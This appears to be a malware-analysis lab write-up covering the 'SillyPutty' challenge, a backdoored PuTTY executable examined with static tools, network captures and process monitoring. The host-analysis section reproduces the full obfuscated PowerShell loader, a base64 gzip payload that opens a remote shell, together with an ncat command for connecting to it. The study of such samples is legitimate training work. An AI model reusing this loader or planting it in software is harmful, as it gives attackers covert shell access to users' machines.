Challenge-Sillyputty

Malware Details

Name - putty.exe.malz Type - Backdoor

Hashes

MD5-

	MD5sum.exe putty.exe.malz

Output - 334a10500feb0f3444bf2e86ab2e76da *putty.exe.malz

SHA256-

	sha256sum.exe putty.exe.malz

Output -0c82e654c09c8fd9fdf4899718efa37670974c9eec5a8fc18a167f93cea6ee83 *putty.exe.malz

Virustotal results - Malicious

Architecture of binary - Intel x86

Static Analysis

Strings-

Tool used - FLOSS

Command -

	floss.exe putty.exe.malz

Screenshot-->

Interesting Strings-->

User-Key-File-3
PuTTY-User-Key-FUser-Key-File-2
User-Key-File-1
ile-
on2-Parallelism
Argon2-Paralleli})D
PuTTY downstream no longer available
SSHCONNECTION@putty.projects.tartarus.org-2.0-
MNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz@[\]^_`{
HL.FIG
bjnh.lyku
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Release 0.76
-Release-0.76
1fd7baa7344bb38d62a024e5dba3a720c67d05cf
0123456789ABCDEF
gss_init_sec_context
gss_delete_sec_context
DeleteSecurityContext
CryptReleaseContext
Copy to clipboard in RTF as well as plain text
Enable blinking text
Permit control characters in pasted text
Last selected text
BlinkText
Cursor Text
rxvt
PuTTY remote printer output
All session output
Printable output
Abort Output
timeout
About
Network error: Invalid argument
UserNameFromEnvironment
Comment
Proxy error: SOCKS server wanted IDENTD on client
config-ssh-tryagent
SSHManualHostKeys
Software\SimonTatham\PuTTY\SshHostKeys
CtrlAltKeys
ApplicationCursorKeys
SOFTWARE\MIT\Kerberos
auth-agent@openssh.com
auth-agent-req@openssh.com
hmac-sha1-96-etm@openssh.com
hmac-sha2-256-etm@openssh.com
hmac-md5-etm@openssh.com
hmac-sha1-etm@openssh.com
zlib@openssh.com
chacha20-poly1305@openssh.com
des-cbc@ssh.com
spoolss.dll
winmm.dll
sspicli.dll
shcore.dll
wship6.dll
crypt32.dll
secur32.dll
user32.dll
comctl32.dll
shell32.dll
Shell32.dll
kernel32.dll
wsock32.dll
advapi32.dll
ws2_32.dll
Software\SimonTatham\PuTTY\CHMPath
Software\SimonTatham\PuTTY64\CHMPath
winadj@putty.projects.tartarus.org
simple@putty.projects.tartarus.org

IAT analysis-

Tools used - PEview

Interesting results -->

Malware is in the form of a windows portable executable

Looking at IMAGE_SECTION_HEADER.text we get,

Virtual size and size of raw data is approximately same. Thus the binary is an unpacked binary.

A lot of libraries and APIs have been loaded. This confirms that the binary is an unpacked one.

Now for further analysis , open PEstudio.

Bringing it all together-

Tools used - PEstudio

Interesting results -->

Potential Malware indicators -->

File-header (intel-386) -->

Flagged IAT Imports-->

Out of total 326 imports, 51 of them were flagged as malicious with majority of them being focused on windowing and execution. But this doesn't conclude anything as legitimate putty program also uses these APIs.

Dynamic Analysis

Initial detonation

Without network - A blue powershell window pops up and closes itself immediately.

A normal putty window opens. Most probably the malware detected the sandbox.

With network -

The same happens on detonation of the sample.

Network Analysis

Tools used- inetsim and wireshark.

After detonation and capturing packets from the malware-

We see a http request for 3 files one after the other in wireshark -

And a DNS request -->

for the domain address-->

	bonus2.corporatebonusapplication.local

This domain address doesn't exist in our network. So we edit out hosts file to point to the windows box .

Command-->

		nano C:\Windows\System32\drivers\etc\hosts

Host Analysis

Tools used - procmon , tcpview

We fire up procmon and detonate the malware.

A lot of processes load up. Looking up process tree we get -

A powershell command is running in the background. This must be the blue window we saw at the beginning.The command is -

powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAOW/UWECA51W227jNhB991cMXHUtIRbhdbdAESCLepVsGyDdNVZu82AYCE2NYzUyqZKUL0j87yUlypLjBNtUL7aGczlz5kL9AGOxQbkoOIRwK1OtkcN8B5/Mz6SQHCW8g0u6RvidymTX6RhNplPB4TfU4S3OWZYi19B57IB5vA2DC/iCm/Dr/G9kGsLJLscvdIVGqInRj0r9Wpn8qfASF7TIdCQxMScpzZRx4WlZ4EFrLMV2R55pGHlLUut29g3EvE6t8wjl+ZhKuvKr/9NYy5Tfz7xIrFaUJ/1jaawyJvgz4aXY8EzQpJQGzqcUDJUCR8BKJEWGFuCvfgCVSroAvw4DIf4D3XnKk25QHlZ2pW2WKkO/ofzChNyZ/ytiWYsFe0CtyITlN05j9suHDz+dGhKlqdQ2rotcnroSXbT0Roxhro3Dqhx+BWX/GlyJa5QKTxEfXLdK/hLyaOwCdeeCF2pImJC5kFRj+U7zPEsZtUUjmWA06/Ztgg5Vp2JWaYl0ZdOoohLTgXEpM/Ab4FXhKty2ibquTi3USmVx7ewV4MgKMww7Eteqvovf9xam27DvP3oT430PIVUwPbL5hiuhMUKp04XNCv+iWZqU2UU0y+aUPcyC4AU4ZFTope1nazRSb6QsaJW84arJtU3mdL7TOJ3NPPtrm3VAyHBgnqcfHwd7xzfypD72pxq3miBnIrGTcH4+iqPr68DW4JPV8bu3pqXFRlX7JF5iloEsODfaYBgqlGnrLpyBh3x9bt+4XQpnRmaKdThgYpUXujm845HIdzK9X2rwowCGg/c/wx8pk0KJhYbIUWJJgJGNaDUVSDQB1piQO37HXdc6Tohdcug32fUH/eaF3CC/18t2P9Uz3+6ok4Z6G1XTsxncGJeWG7cvyAHn27HWVp+FvKJsaTBXTiHlh33UaDWw7eMfrfGA1NlWG6/2FDxd87V4wPBqmxtuleH74GV/PKRvYqI3jqFn6lyiuBFVOwdkTPXSSHsfe/+7dJtlmqHve2k5A5X5N6SJX3V8HwZ98I7sAgg5wuCktlcWPiYTk8prV5tbHFaFlCleuZQbL2b8qYXS8ub2V0lznQ54afCsrcy2sFyeFADCekVXzocf372HJ/ha6LDyCo6KI1dDKAmpHRuSv1MC6DVOthaIh1IKOR3MjoK1UJfnhGVIpR+8hOCi/WIGf9s5naT/1D6Nm++OTrtVTgantvmcFWp5uLXdGnSXTZQJhS6f5h6Ntcjry9N8eXQOXxyH4rirE0J3L9kF8i/mtl93dQkAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"

There is also a conhost.exe (console host) running under powershell which must host the above command. This is the command for a remote shell which the malware author might be trying to exploit.

We can conclude that this is a backdoor.

Converting the base64 string we get to know that the malware opens up a port on localhost:8443 and only communicates with ssl/https. Thus in order to interact with the shell we type-

	ncat -nvlp --ssl 8443

We run both the command and the malware and we get the shell -

PreviousMalware.unknown.exe.Malz NextBind_shell RAT Analysis

Last updated 7 months ago